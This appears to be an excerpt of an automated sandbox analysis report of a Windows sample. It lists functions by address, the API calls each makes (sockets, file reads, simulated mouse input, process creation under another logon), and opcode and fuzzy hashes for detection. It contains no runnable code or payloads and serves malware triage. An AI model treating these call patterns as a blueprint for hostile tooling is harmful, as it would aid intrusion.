                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                  • String ID:
                                                                                  • API String ID: 650687236-0
                                                                                  • Opcode ID: dbe19d0fe594085f5b5c2028dd6e07c45df158a2a243e3d6eb27525cd77d6c15
                                                                                  • Instruction ID: 4d92a42a1dc809c03ce65e5573711913808b637db1c0f4951981ee93aaf1063b
                                                                                  • Opcode Fuzzy Hash: dbe19d0fe594085f5b5c2028dd6e07c45df158a2a243e3d6eb27525cd77d6c15
                                                                                  • Instruction Fuzzy Hash: E9519C71A00219AFCF11EF64C855ABEBBF4BF58310F10445AED06BB351DB74AE458B94
                                                                                  Function 00534AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00534B10
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00534B5B
                                                                                  • IsMenu.USER32(00000000), ref: 00534B7B
                                                                                  • CreatePopupMenu.USER32 ref: 00534BAF
                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00534C0D
                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00534C3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3311875123-0
                                                                                  • Opcode ID: f63ad4356d98ae7d7eab3030c5d9782de215d5c4fc4dd56305615bb0b697e8df
                                                                                  • Instruction ID: d150a298ed5c6529f995a526a732f0b8a0cba2f95be21103af4773f2dd9f2988
                                                                                  • Opcode Fuzzy Hash: f63ad4356d98ae7d7eab3030c5d9782de215d5c4fc4dd56305615bb0b697e8df
                                                                                  • Instruction Fuzzy Hash: 7351CD7060124AEBDF20CFA8D888BADBFF4BF44318F148159E4159B291E370AD84CF61
                                                                                  Function 00548DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0058DC00), ref: 00548E7C
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548E89
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00548EAD
                                                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 00548EC5
                                                                                  • _strlen.LIBCMT ref: 00548EF7
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548F6A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_strlenselect
                                                                                  • String ID:
                                                                                  • API String ID: 2217125717-0
                                                                                  • Opcode ID: 4ce8ff9c008cd79a3eed52a9f3ddd01a07b41a423509dfb861ae5696fcb2cda5
                                                                                  • Instruction ID: 2c70862334eda0c699fbd024a1bde6a99147bfff0bbe6ff28074edc8e7f8918c
                                                                                  • Opcode Fuzzy Hash: 4ce8ff9c008cd79a3eed52a9f3ddd01a07b41a423509dfb861ae5696fcb2cda5
                                                                                  • Instruction Fuzzy Hash: 29418F71500108ABCB14EB64DD86EFEBBB9FF58318F10455AF51AA7291DF34AE44CB60
                                                                                  Function 0050ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • BeginPaint.USER32(?,?,?), ref: 0050AC2A
                                                                                  • GetWindowRect.USER32(?,?), ref: 0050AC8E
                                                                                  • ScreenToClient.USER32(?,?), ref: 0050ACAB
                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0050ACBC
                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 0050AD06
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0056E673
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                  • String ID:
                                                                                  • API String ID: 2592858361-0
                                                                                  • Opcode ID: 3332c31daea1f09c702537978b6be4a48c97e1d660e75941127a1de9d626ea55
                                                                                  • Instruction ID: a6e81c8382927b7ab8147c327a872f529a00a9eb14a6b45a689317f827709163
                                                                                  • Opcode Fuzzy Hash: 3332c31daea1f09c702537978b6be4a48c97e1d660e75941127a1de9d626ea55
                                                                                  • Instruction Fuzzy Hash: C341BF711003019FD710DF24D889FBA7FB8BB65320F140629F9A5872E1D731AC88EB62
                                                                                  Function 0055E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(005B1628,00000000,005B1628,00000000,00000000,005B1628,?,0056DC5D,00000000,?,00000000,00000000,00000000,?,0056DAD1,00000004), ref: 0055E40B
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0055E42F
                                                                                  • ShowWindow.USER32(005B1628,00000000), ref: 0055E48F
                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 0055E4A1
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0055E4C5
                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0055E4E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 642888154-0
                                                                                  • Opcode ID: 49c52881198c1c2ea3a0f05ba84d42a27274bf36fa31331b5965059da52ea2f0
                                                                                  • Instruction ID: 0203bb6b5ff225ccdaa5e7f473e9cf6546256de9492ab7cd7dc5d9d0981951d0
                                                                                  • Opcode Fuzzy Hash: 49c52881198c1c2ea3a0f05ba84d42a27274bf36fa31331b5965059da52ea2f0
                                                                                  • Instruction Fuzzy Hash: 20412C30601141EFDB2ACF24D4AAB947FB1BF09306F1841AAEE5C9F1A2C731A949DB51
                                                                                  Function 005398BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 005398D1
                                                                                    • Part of subcall function 0050F4EA: std::exception::exception.LIBCMT ref: 0050F51E
                                                                                    • Part of subcall function 0050F4EA: __CxxThrowException@8.LIBCMT ref: 0050F533
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00539908
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00539924
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0053999E
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005399B3
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 005399D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 2537439066-0
                                                                                  • Opcode ID: f5b14cd7696829cbade703e918b0e86035acd095c547bca0ab2b840423cdb96a
                                                                                  • Instruction ID: 17faef2b164e080ca6ad0069518d151c4e3a23ba202c449287a823b0bbdcd00d
                                                                                  • Opcode Fuzzy Hash: f5b14cd7696829cbade703e918b0e86035acd095c547bca0ab2b840423cdb96a
                                                                                  • Instruction Fuzzy Hash: 9831A371900105EBDB10EF95DC89E6E7B78FF84310F1440A9F905AB286D770DA14DBA0
                                                                                  Function 00549B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,005477F4,?,?,00000000,00000001), ref: 00549B53
                                                                                    • Part of subcall function 00546544: GetWindowRect.USER32(?,?), ref: 00546557
                                                                                  • GetDesktopWindow.USER32 ref: 00549B7D
                                                                                  • GetWindowRect.USER32(00000000), ref: 00549B84
                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00549BB6
                                                                                    • Part of subcall function 00537A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
                                                                                  • GetCursorPos.USER32(?), ref: 00549BE2
                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00549C44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4137160315-0
                                                                                  • Opcode ID: 4a36f864e96e0f8cf69b02802da09fdc9e03830a4520cb8efe120bbd2f32c320
                                                                                  • Instruction ID: 40215a6726fad0dd19104de9493cd2f56a0f804283c4b2ec8fb37d70217cdb85
                                                                                  • Opcode Fuzzy Hash: 4a36f864e96e0f8cf69b02802da09fdc9e03830a4520cb8efe120bbd2f32c320
                                                                                  • Instruction Fuzzy Hash: CD31C37250830AABC710DF14D849F9BBBE9FF89314F000919F589D7181D631E948DB91
                                                                                  Function 0052AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0052AFAE
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0052AFB5
                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0052AFC4
                                                                                  • CloseHandle.KERNEL32(00000004), ref: 0052AFCF
                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0052AFFE
                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 0052B012
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                  • String ID:
                                                                                  • API String ID: 1413079979-0
                                                                                  • Opcode ID: 715f3d9feaccfa0d830da00bdda725560a42a04050069b36a4a5c233fa61218e
                                                                                  • Instruction ID: a10c22791365f4467520699544cfda15607bbd9e797197e9bbe7688ef9d7b353
                                                                                  • Opcode Fuzzy Hash: 715f3d9feaccfa0d830da00bdda725560a42a04050069b36a4a5c233fa61218e
                                                                                  • Instruction Fuzzy Hash: 48214972100219AFDF028FA4EE49FAE7BB9FF46304F044015FA05A21A1D37A9D65EB61
                                                                                  Function 0055EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0050AFE3
                                                                                    • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050AFF2
                                                                                    • Part of subcall function 0050AF83: BeginPath.GDI32(?), ref: 0050B009
                                                                                    • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050B033
                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0055EC20
                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0055EC34
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0055EC42
                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0055EC52
                                                                                  • EndPath.GDI32(00000000), ref: 0055EC62
                                                                                  • StrokePath.GDI32(00000000), ref: 0055EC72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                  • String ID:
                                                                                  • API String ID: 43455801-0
                                                                                  • Opcode ID: 97089bc6d6591faf1f742f6b9e7d189bae3c5af5bf726620898f2031d9d880de
                                                                                  • Instruction ID: 8c0a2da084a0062bd9787234a91f1204a7a18ec6cc3f729d92c9493b670bb883
                                                                                  • Opcode Fuzzy Hash: 97089bc6d6591faf1f742f6b9e7d189bae3c5af5bf726620898f2031d9d880de
                                                                                  • Instruction Fuzzy Hash: 21110C76000159BFDB019F90EC88EEA7F7DEF14350F048112BE0849160D7719E99EBA0
                                                                                  Function 0052E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0052E1C0
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0052E1D1
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0052E1D8
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0052E1E0
                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0052E1F7
                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0052E209
                                                                                    • Part of subcall function 00529AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00529A05,00000000,00000000,?,00529DDB), ref: 0052A53A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                  • String ID:
                                                                                  • API String ID: 603618608-0
                                                                                  • Opcode ID: 8cfcff770b9153af6169914697819d8f4ab3ab4c43d2b2dc6d4c7631dd0df5d9
                                                                                  • Instruction ID: effda65a6c91443f1a5595cf038647e8f10c2d30528ee1ae1dda4eead308f936
                                                                                  • Opcode Fuzzy Hash: 8cfcff770b9153af6169914697819d8f4ab3ab4c43d2b2dc6d4c7631dd0df5d9
                                                                                  • Instruction Fuzzy Hash: 760184B5A00315BFEB109BA5AC4AF5EBFB8EF59351F004066EA08A7390D6719C00DBA0
                                                                                  Function 00517B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __init_pointers.LIBCMT ref: 00517B47
                                                                                    • Part of subcall function 0051123A: __initp_misc_winsig.LIBCMT ref: 0051125E
                                                                                    • Part of subcall function 0051123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00517F51
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00517F65
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00517F78
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00517F8B
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00517F9E
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00517FB1
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00517FC4
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00517FD7
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00517FEA
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00517FFD
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00518010
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00518023
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00518036
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00518049
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0051805C
                                                                                    • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0051806F
                                                                                  • __mtinitlocks.LIBCMT ref: 00517B4C
                                                                                    • Part of subcall function 00517E23: InitializeCriticalSectionAndSpinCount.KERNEL32(005AAC68,00000FA0,?,?,00517B51,00515E77,005A6C70,00000014), ref: 00517E41
                                                                                  • __mtterm.LIBCMT ref: 00517B55
                                                                                    • Part of subcall function 00517BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00517B5A,00515E77,005A6C70,00000014), ref: 00517D3F
                                                                                    • Part of subcall function 00517BBD: _free.LIBCMT ref: 00517D46
                                                                                    • Part of subcall function 00517BBD: DeleteCriticalSection.KERNEL32(005AAC68,?,?,00517B5A,00515E77,005A6C70,00000014), ref: 00517D68
                                                                                  • __calloc_crt.LIBCMT ref: 00517B7A
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00517BA3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                  • String ID:
                                                                                  • API String ID: 2942034483-0
                                                                                  • Opcode ID: c0bdab1028dc499002976513d80085204c72241f6ac861ff047d1d0300e04dee
                                                                                  • Instruction ID: 7aadbc465707f64fe4e8e0c596dba6e6e40add4575b72a402afbc7d553cd5d3e
                                                                                  • Opcode Fuzzy Hash: c0bdab1028dc499002976513d80085204c72241f6ac861ff047d1d0300e04dee
                                                                                  • Instruction Fuzzy Hash: F4F0963251D71B19F664773C7C4AACA2EF4BF4A730B204799F864C60D1FF2588C29165
                                                                                  Function 004F27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004F281D
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 004F2825
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004F2830
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004F283B
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 004F2843
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004F284B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: dba0a3a6addc934d0174a26e9b6ccfbde98483e75ee8c06a387959607df5f3ae
                                                                                  • Instruction ID: b65747fbd2468064c80dac485b91d4208c08c80bf2c162bdefea8fff76b1b5c5
                                                                                  • Opcode Fuzzy Hash: dba0a3a6addc934d0174a26e9b6ccfbde98483e75ee8c06a387959607df5f3ae
                                                                                  • Instruction Fuzzy Hash: 0F0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A868CBE5
                                                                                  Function 00539AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 1423608774-0
                                                                                  • Opcode ID: d631eeb57d5a01edb3fb7f478f1f370657e003eb5e985534c93e78f107ebee58
                                                                                  • Instruction ID: 7881535b85d9bc1aa20ab429275e4ef6736efcffcd7113ee63a20d7c0f50ec46
                                                                                  • Opcode Fuzzy Hash: d631eeb57d5a01edb3fb7f478f1f370657e003eb5e985534c93e78f107ebee58
                                                                                  • Instruction Fuzzy Hash: 1201D17A102212ABD7141B94FC48DFB7B7AFF98301B040529F507A20A1DBB49845FB70
                                                                                  Function 00537BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00537C07
